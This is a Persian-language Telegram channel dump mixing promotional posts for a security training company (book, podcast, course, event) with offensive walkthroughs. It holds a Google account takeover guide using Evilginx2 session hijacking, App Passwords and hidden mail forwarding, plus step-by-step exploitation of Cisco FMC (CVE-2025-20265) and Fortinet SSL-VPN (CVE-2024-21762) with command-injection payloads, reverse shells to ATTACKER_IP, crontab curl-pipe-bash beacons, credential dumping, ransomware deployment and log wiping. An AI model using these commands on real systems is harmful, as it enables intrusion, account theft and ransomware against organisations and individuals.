👈 روش 1: MITM + Session Hijack
⬅️ با Evilginx2، Token فعال از قربانی دریافت می‌شه (cookie hijacking)
⬅️ مهاجم بدون نیاز به رمز یا 2FA، وارد صفحه تنظیمات گوگل می‌شه

👈 روش 2: Credential Harvesting + Real-Time Login
⬅️ اگه قربانی سریعاً بعد از ورود اطلاعات به صفحه فیک، اونا رو تأیید کنه، مهاجم بلافاصله وارد اکانت شده و به تنظیمات می‌ره.

👈 تو تنظیمات:
⬅️ ایجاد App Password از مسیر:
Google Account → Security → Signing in to Google → App passwords
⬅️ وارد کردن یه اسم جعلی مثل Outlook-Sync یا Mobile-Login
⬅️ دریافت رمز عبور ۱۶ کاراکتری یک‌بار مصرف و استفاده از اون تو اتصال‌های IMAP

🔹 مرحله 5: استخراج دیتاها و ماندگاری
👈 ابزارها:
⬅️ یک. Thunderbird / Outlook + IMAP plugin برای خوندن ایمیل‌ها با App Password
⬅️ دو. IMAPSync / OfflineIMAP برای بک‌آپ کامل
⬅️ سه. Google Takeout API abuse اگه سطح دسترسی اجازه بده
👈 روش‌های ماندگاری:
⬅️ ایجاد فیلتر برای فوروارد مخفیانه ایمیل‌ها
⬅️ مخفی‌سازی لاگین از طریق device rename یا IP proxy
⬅️ افزودن recovery email جدید در صورت امکان

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

سلام. وقت بخیر دوستان.
اگر از دوستان کسی آمادگی رکورد دوره‌های آموزشی شامل حوزه امنیت، برنامه‌نویسی (مرتبط با امنیت) و شبکه رو داره (بصورت حضوری تو دفتر لیان با استفاده از تجهیزات مدرن)؛ می‌تونیم از طریق پیام خصوصی بنده، بیشتر در مورد جزئیات صحبت کنیم.
ضمنا اگر کسی رو هم می‌شناسین که امکان همکاری براشون فراهم هست، لطفا پیام بنده رو براشون ارسال کنین.
ارتباط از طریق آی‌دی:
@vahid_elmi

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ سناریوی سوءاستفاده از CVE-2025-20265 در Cisco FMC

1. شناسایی (Reconnaissance)
🔹 هکر ابتدا شبکه هدف رو اسکن می‌کنه تا Cisco FMC رو شناسایی کنه:
⬅️ ابزارها:

nmap -sV -p 443,1812,1813 <target>

اسکن روی پورت‌های 443 (Web UI) و 1812/1813 (RADIUS Authentication)
⬅️ خروجی:

PORT     STATE SERVICE VERSION
443/tcp  open  https   Cisco Secure FMC WebUI
1812/udp open  radius
1813/udp open  radius-acct

وجود سرویس RADIUS روی FMC تأیید شد.

2. آماده‌سازی Payload (Exploit Development)
🔹 مشکل اصلی تو ماژول RADIUS Authentication Handlerاه. ورودی‌های یوزرنیم و پسورد مستقیماً به یه دستور shell پاس می‌شن.
⬅️ اکسپلویت: Command Injection از طریق Username یا Password.
⬅️ ابزار تست: radtest (از FreeRADIUS package).
نمونه دستور برای تست:

radtest "attacker; id;" password <FMC_IP> 1812 secret

اگه آسیب‌پذیر باشه، خروجی RADIUS شامل اجرای دستور id خواهد شد و تو لاگ‌ها یا پاسخ RADIUS مشاهده می‌شه.

3. اجرای Remote Code Execution (Initial Access)
🔹 مهاجم به جای دستور ساده، از payload برای دریافت reverse shell استفاده می‌کنه:
⬅️ نمونه Payload:

radtest "user; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" pass <FMC_IP> 1812 secret

⬅️ ابزار مورد استفاده:
ابزار netcat روی سیستم مهاجم (nc -lvnp 4444) برای دریافت shell.
نتیجه: مهاجم یه Root Shell روی FMC به دست می‌آره.

4. تثبیت دسترسی (Persistence)
🔹 پس از دسترسی اولیه، مهاجم اقدامات زیر رو انجام می‌ده:
⬅️ یک. افزودن کلید SSH برای دسترسی دائمی:

mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3..." >> /root/.ssh/authorized_keys

⬅️ دو. ایجاد Cronjob برای Beacon ارتباط:

echo "* * * * * root curl http://ATTACKER_IP/beacon.sh | bash" >> /etc/crontab

⬅️ سه. نصب Agent برای Cobalt Strike Beacon یا Sliver C2:

curl -o /tmp/beacon http://ATTACKER_IP/beacon && chmod +x /tmp/beacon && /tmp/beacon &

5. حرکت جانبی (Lateral Movement)
🔹 از اونجایی که FMC مرکز مدیریت تموم Firepowerهاست:
⬅️ مهاجم می‌تونه پالیسی‌ها رو تغییر بده تا فایروال‌های مرزی ترافیک C2 یا بدافزار رو بلاک نکنن.
⬅️ ابزارهایی مثل psql (برای دسترسی به دیتابیس PostgreSQL FMC) یا scp برای انتقال فایل‌ها استفاده می‌شه.
مثال: استخراج credential ذخیره‌شده تو FMC:

psql -U admin fmcdb -c "SELECT username,password FROM users;"

6. بهره‌برداری نهایی (Actions on Objectives)
🔹 پس از تسلط کامل روی FMC:
⬅️ باز کردن ACLها برای ورود و خروج ترافیک مهاجم.
⬅️ خاموش‌کردن یا تغییر IPS Signatures برای جلوگیری از شناسایی.
⬅️ استقرار بک‌دور روی همه فایروال‌ها با deploy پالیسی آلوده.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

🔵راهنمای تیم آبی در مواجه با این آسیب‌پذیری
🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

وقتی اولین بار این کتاب رو دیدم، بیشتر از هر چیزی حس کردم لازمِ این روایت به زبان فارسی منتقل بشه. نه برای اینکه بگیم بقیه اشتباه کردن، بلکه چون این کتاب یه زاویه‌دید و دسترسی مستند به بخشی از دنیای سایبر میده که کمتر توی منابع فارسی به شکل منسجم و قابل‌فهم وجود داشته. به همین دلیل با دکتر رحیمیان تصمیم گرفتیم این اثر رو با دقت ترجمه کنیم تا هر کسی (چه متخصص باشه، چه مدیر، چه دانشجو یا فقط کنجکاو) بتونه ازش بهره ببره.

این کتاب، نوشته نیکول پرلروث، گزارشی عمیق و پرجزئیاته از بازار پنهون خرید و فروش آسیب‌پذیری‌های زیرو-دی، برنامه‌های دولتی برای توسعه جنگ‌افزارهای سایبری و رقابت بین قدرت‌ها برای برتری تو فضای دیجیتال. پرلروث سال‌ها به‌عنوان خبرنگار امنیت سایبری کار کرده و از مصاحبه با بازیگران مختلف این میدون (از هکرها و دلالای آسیب‌پذیری نرم‌افزاری تا مقامات دولتی) روایت‌هایی میاره که هم تکون‌دهنده‌ست و هم هشداردهنده.

ما توی ترجمه سعی کردیم دو چیز رو هم‌زمان داشته باشیم: دقت فنی و روون بودن متن. یعنی هم اصطلاحات تخصصی درست منتقل بشه و هم متن طوری روون شده که خواننده حتی اگه از اول با واژه‌ها آشنا نباشه، با جریان کتاب همراه بشه و خسته نشه. نتیجه این شده که این نسخه مناسبِ مدیرها، پژوهشگرها، دانشجوها، تیم‌های امنیت و هر کسی که می‌خواد بفهمه دنیاهای پشت پرده‌ی تهدیدات سایبری چه‌طور کار می‌کنن باشه.

چرا باید این کتاب رو بخونین؟
چون نشونه‌های روشنی میده از اینکه تهدیدات سایبری دیگه محدود به هک‌های ساده و سرقت اطلاعات نیستن؛ این تهدیدها می‌تونن زیرساخت‌ها رو فلج کنن، سیاست‌ها رو تحت‌تأثیر بذارن و در سطح بین‌الملل ابزاری از جنس قدرت بشن. خوندن این کتاب کمک می‌کنه دید استراتژیک‌تری نسبت به مدیریت ریسک، سرمایه‌گذاری تو امنیت و برنامه‌ریزی دفاعی پیدا کنین.

این ترجمه رو انتشارات فناوران لیان (وابسته به گروه لیان) منتشر کرده و من و دکتر رحیمیان با تعهد کامل روی صحت و انتقال پیام کتاب کار کردیم. اگه دنبال یک منبع قابل‌اعتنا و درعین‌حال جذاب برای درک عمیق‌ترِ جنگ‌افزارهای سایبری هستین، این کتاب یه انتخاب ضروریه.

ضمنا برای 50 خرید اول کد تخفیف 25% لحاظ شده که می‌تونین از طریق لینک زیر و با کد تخفیف book-25، کتاب رو تهیه کنین:
https://liangroup.net/shop/This-Is-How-They-Tell-Me-the-World-Ends

ضمنا حتما بعد از مطالعه کتاب بهم فیدبک بدین.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

چند وقتی هست به دنبال برگزاری منظم همایش تخصصی حوزه امنیت هستم. تقریبا یک سالی هم هست روی هزینه‌ها تحقیق کردم و با ارتباطاتی که با دانشجوها و مخاطبین حوزه داشتم، بازخورد خوبی از این موضوع گرفتم.
به دلیل هزینه بالای برگزاری همچین رویدادهایی، تو اولین قدم یک فراخوان عمومی منتشر می‌کنم برای جذب اسپانسر که جزئیات این طرح اسپانسری به همراه امکانات جانبی، لیست شده. امیدوارم بتونیم با اسپانسری شرکت‌ها این همایش رو بصورت سالانه و با کیفیت و ارائه اساتید برتر حوزه امنیت سایبری برگزار کنم.

ضمنا جذب اسپانسر به دلیل رایگان کردن حضور افراد علاقمند به حوزه امنیت هست.

لطفا در صورت امکان این پست رو شیر کنین یا اگر شرکت‌هایی می‌شناسین که توانایی اسپانسری همچین رویدادی رو دارند، براشون ارسال کنین.

با تشکر.

شماره تماس برای جزئیات بیشتر: 09209104151

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ سناریوی سوءاستفاده از CVE-2024-21762

◀️ توضیح کوتاه:
یه آسیب‌پذیری خیلی جدّیه توی کامپوننت SSL-VPNِ محصولات Fortinet (FortiOS / FortiProxy): برنامه‌ای که ترافیک SSL-VPN رو هندل می‌کنه گاهی به‌خاطر ورودی‌های ساخته‌شده‌ی خاص، یه نوشتهٔ خارج از بافر انجام می‌ده؛ در نتیجه ممکنه حافظه خراب بشه و مهاجم بتونه کد یا دستور اجرا کنه. این باگ به‌صورت ریموت و بدون نیاز به لاگین قابل بهره‌برداری گزارش شده و نمرهٔ بحرانی یعنی 9.6 داره. البته این آسیب‌پذیری مربوط به سال گذشته هست.

◀️ سناریو نفوذ:
تصور کنین من یه هکر خارجی‌ام که می‌خوام به شبکه یه سازمان بزرگ مثل یه بانک یا شرکت انرژی نفوذ کنم. دستگاه هدفم یه فورتی‌گیت با SSL VPN فعاله و نسخه آسیب‌پذیر FortiOS داره، مثلاً 7.2.5. این سناریو بر اساس حملات واقعی ساخته شده، مثل اون چیزی که تو گزارش Darktrace توضیح دادن: هکرها از CVE-2024-21762 برای اجرای کد از راه دور (RCE) بدون نیاز به احراز هویت استفاده کردن، بعدش به سوءاستفاده از اعتبارها و دسترسی RDP رسیدن. همچنین، بر پایه PoCهای عمومی تو گیتهاب مثل اسکریپت پایتون d0rb که RCE رو نشون می‌ده. این حمله از راه دوره و بدون نیاز به لاگین اولیه، اما اگه تیم آبی مانیتورینگ داشته باشه، ریسک کشفش بالاست. در واقعیت، بیش از 133 هزار دستگاه آسیب‌پذیر بودن و هکرها مثل گروه‌های باج‌افزاری Qilin از حملات اتوماتیک استفاده کردن.

◀️ مرحله ۱: شناسایی و جمع‌آوری اطلاعات اولیه (Reconnaissance and Initial Access)
اول باید هدف رو پیدا کنیم. از ابزارهایی مثل Shodan یا Censys استفاده می‌کنیم تا دستگاه‌های فورتی‌گیت با SSL VPN باز رو جستجو کنیم:
کوئری مثل "FortiSSLVPN" یا پورت‌های ۴۴۳/۱۰۴۴۳ با بنر "Fortinet"
🔵 بعدش با Nmap اسکن دقیق می‌کنیم:

nmap -p 443,10443 -sV --noscript http-noscript target-ip 

تا نسخه FortiOS رو شناسایی کنیم. اگه لیست IPهارو داشته باشیم، از Masscan برای اسکن استفاده می‌کنیم.
تو عمل، از یه VPS مثل AWS یا DigitalOcean استفاده می‌کنیم تا traceable نباشه. تو حملات واقعی، هکرها از Shodan برای پیدا کردن بیش از ۱۳۳ هزار دستگاه آسیب‌پذیر استفاده کردن. مطمئن می‌شیم SSL VPN فعاله. این مرحله حدود ۱۰ تا ۳۰ دقیقه طول می‌کشه.

◀️ مرحله ۲: بهره‌برداری از آسیب‌پذیری (Exploitation)
حالا نوبت بهره‌برداریه. ابزارهای اصلی PoCهای گیتهاب هستن، مثل:
🔵 اسکریپت پایتون برای RCE با payload سفارشی:
d0rb/CVE-2024-21762
🔵 اسکنر با تحویل reverse shell:
abrewer251/CVE-2024-21762_FortiNet_PoC
🔵 اکسپلویت با تحلیل out-of-bounds write:
h4x0r-dz/CVE-2024-21762
🔵 چک‌کننده امن بدون کرش:
BishopFox/cve-2024-21762-check

آسیب‌پذیری تو اندپوینت /remote/hostcheck_validate SSL VPN هست، جایی که یه out-of-bounds write (با دو بایت اورفلو) اجازه تزریق کامند می‌ده. از پایتون استفاده می‌کنیم تا ری‌کوئست HTTP سفارشی بفرستیم.
🔵 مثلاً اسکریپت d0rb رو کلون می‌کنیم:

 git clone https://github.com/d0rb/CVE-2024-21762

🔵 بعدش payload رو تغییر می‌دیم، مثلاً reverse shell با:

shell 
Netcat (nc -e /bin/sh attacker-ip 4444).

گام به گام:
🔵 یک. لیسنر رو راه می‌ندازیم:

shell 
nc -lvnp 4444

🔵 اسکریپت رو ران می‌کنیم:

shell 
python3 exploit.py --target https://target-ip:10443 --payload "curl attacker-ip/payload.sh | bash"

این ری‌کوئست به /remote/hostcheck_validate فرستاده می‌شه با هدرهای malformed برای تریگر اورفلو و اجرای کامند.
🔵 اگه موفق بشه، shell می‌گیریم با سطح دسترسی sslvpnd (نه root، اما می‌تونیم با اکسپلویت‌های لوکال escalate کنیم).

تو حملات واقعی، هکرها از این مورد برای اجرای curl به فایل‌های js یا py (مثل exp-7.2.6.py) استفاده کردن تا بک‌دور نصب کنن. زمان این مرحله ۵ تا ۱۵ دقیقه‌ست. اگه کرش کنه، با payload کوچکتر retry می‌کنیم. تو گزارش Rapid7، گفتن که state-sponsored actors از این zero-dayها استفاده کردن. همچنین، تو آوریل ۲۰۲۵، بیش از ۱۴ هزار دستگاه با روش‌های جدید post-exploitation compromised شدن.

◀️ مرحله ۳: بعد از بهره‌برداری (Post-Exploitation)
بعد از گرفتن shell، کار اصلی شروع می‌شه. از Metasploit برای persistence استفاده می‌کنیم (مثل ماژول fortigate_ssl_vpn اگه سفارشیش کنیم)، یا Cron برای بک‌دور. Cobalt Strike برای C2 عالیه.
🔵 گام‌ها:
⚫ فایل‌های کانفیگ رو دامپ می‌کنیم: cat /data/etc/sslvpn.conf برای گرفتن credentialها.
⚫ رول‌های فایروال رو تغییر می‌دیم تا دسترسی راحت‌تر بشه.
⚫ باج‌افزار deploy می‌کنیم، مثل Qilin.
⚫ به شبکه داخلی pivot می‌کنیم با RDP یا SMB.
⚫ لاگ‌ها رو پاک می‌کنیم: rm /var/log/sslvpn.log.

تو حمله Darktrace، هکرها بعد از RCE به credential abuse و RDP رسیدن. برای persistence، تو گزارش Fortinet، threat actor از vulnerability برای read-only access بعد از پچ استفاده کرده. کل حمله می‌تونه در ۱ تا ۲ ساعت تموم بشه، اما اگه بخوایم ماندگار بمونیم، cron job می‌ذاریم برای چک روزانه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

یه سایت با شعار «زندگی کوتاهه، خیانت کن!»... و یه نشت اطلاعات که دنیا رو شوکه کرد.

تو این اپیزود از رادیو امنیت، می‌ریم پشت صحنه‌ی یکی از جنجالی‌ترین افشاگری‌های سایبری تاریخ؛ یعنی ماجرای نشت اطلاعات سایت Ashley Madison رو باهم بررسی می‌کنیم. اینجا فقط بحث یه هک نیست؛ بحث زندگی میلیون‌ها آدمه که با یه کلیک، همه‌چیزشون لو رفت؛ از رابطه‌های پنهان تا جزئی‌ترین رازهای شخصی‌شون. طوری که یه کشیش به دلیل رسوایی اخلاقی ناشی از نشت اطلاعات خودکشی کرد.
با من همراه بشین تا ببینیم چطور یه تیم هکری با اسم “Impact Team”، سایتی با میلیون‌ها کاربر رو به زانو درآورد، و چطور این حادثه نگاه دنیا رو به مفهوم «حریم خصوصی» برای همیشه عوض کرد.

شنیدن این پادکست در کست‌باکس:
https://castbox.fm/episode/id3634195-id510574091

لطفا نظرتون در مورد پادکست و همچنین موضوع مهم "حریم خصوصی" تو کامنت‌ها با من در میون بزارین.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

◀️ یکی از بخش‌های جذاب کتاب "دنیا این‌گونه به پایان می‌رسد" در مورد جزئیات حمله سایبری به تاسیسات هسته‌ای نطنز هست. حمله‌ای که بعد از اون قاعده جنگ سایبری تو کل دنیا تغییر کرد و باعث شد خیلی از کشورها تو رقابت برای بدست آوردن اکسپلویت‌ها و آسیب‌پذیری‌ها قرار بگیرن.
تو این اپیزود رادیو امنیت با الهام از همین بخش کتاب، در مورد استاکس‌نت و عملیات موسوم به "بازی‌های المپیک" صحبت می‌کنیم.

⬅️ لینک CastBox
https://lian.ac/vzH

⬅️ اگر علاقمند به خوندن این کتاب بودین، می‌تونین از لینک زیر اقدام کنین:
https://lian.ac/bms

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ با توجه به نظرسنجی که انجام شد، دوره SANS SEC504 با تدریس مهندس تیموری به مدت 24 ساعت و تا فردا ساعت 14 بصورت رایگان قابل دریافت است.

◀️ مشاهده جزئیات و دانلود دوره از طریق لینک زیر:
https://lian.ac/sec504

🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram

💻 🔫🔫🔫🔫 🔫🔫🔫🔫🔫
☺️ https://liangroup.net/
☺️ @AcademyLian